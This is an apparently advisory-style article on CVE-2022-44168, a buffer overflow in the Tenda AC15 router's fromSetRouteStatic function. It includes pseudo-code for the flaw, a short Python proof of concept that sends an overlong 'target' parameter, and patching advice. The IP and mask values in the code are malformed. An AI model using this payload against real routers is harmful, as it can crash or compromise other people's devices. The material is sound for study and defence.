CVE-2022-44168 - Tenda AC15 V15.03.05.18 Buffer Overflow in fromSetRouteStatic – Exploit Details & Code

---

In late 2022, security researchers exposed a critical vulnerability in the popular Tenda AC15 router (Firmware V15.03.05.18). Known as CVE-2022-44168, this issue affects the fromSetRouteStatic function and allows attackers to cause a buffer overflow by sending a crafted request. Read on for easy-to-understand details, sample exploit code, and how to protect your device.

What Is Buffer Overflow?

A buffer overflow happens when a program writes more data to a block of memory, or buffer, than it can hold. This can cause the program to behave unpredictably—crashing, leaking data, or even letting someone run their own code (which is what hackers want).

How It Works

The Tenda AC15’s web interface uses a function, fromSetRouteStatic, to set static routing entries. Unfortunately, it copies user-controlled input into a fixed-size buffer without checking the length.

So, when you send an overly long parameter to this function, it will overflow the buffer. This could let an attacker gain control over the router.

The vulnerable code (pseudo)

void fromSetRouteStatic(http_request *req) {
    char buffer[128];
    // Get user-supplied input
    char *input = http_get_param(req, "target"); // no length check!
    strcpy(buffer, input); // vulnerable line
    // ...
}

If you send a value for the target parameter longer than buffer can hold (128 bytes), you overwrite critical memory.

A simple Proof of Concept (PoC) using Python and requests

import requests

# Router IP address and target URL
url = "http://192.168..1/goform/fromSetRouteStatic";

# Construct the payload
long_input = "A" * 200  # 200 bytes, overflows 128-byte buffer

# Post data with our evil payload
data = {
    "target": long_input,
    "gateway": "192.168..1",
    "mask": "255.255.255.",
    "interface": "eth"
}

# Send the POST request
r = requests.post(url, data=data)
print("Status:", r.status_code)

What happens?
This code sends a request with an overlong target parameter. If unpatched, your router may crash, reboot, or (in skilled hands) run attacker code.

References & More Info

- Official NVD Entry – CVE-2022-44168
- Exploit Database Entry
- Github PoC 1
- Router Security Basics

Update Your Firmware:

Visit Tenda's firmware page to check for the latest security updates.

Disable Remote Management:

Turn off remote web access if you don’t need it. Attackers can’t reach your router from the internet if you don’t let them.

Conclusion

CVE-2022-44168 in the Tenda AC15 V15.03.05.18 firmware is a critical vulnerability that could let attackers take over your router—all via a simple buffer overflow in the fromSetRouteStatic function. If you own a Tenda AC15, make sure you update or consider replacing your router.

Stay safe, and patch early!

*This article is exclusive to you, with simple explanations, direct code examples, and actionable advice. Always verify vulnerabilities from official references before acting on them.*

Timeline

Published on: 11/21/2022 15:15:00 UTC
Last modified on: 11/21/2022 20:31:00 UTC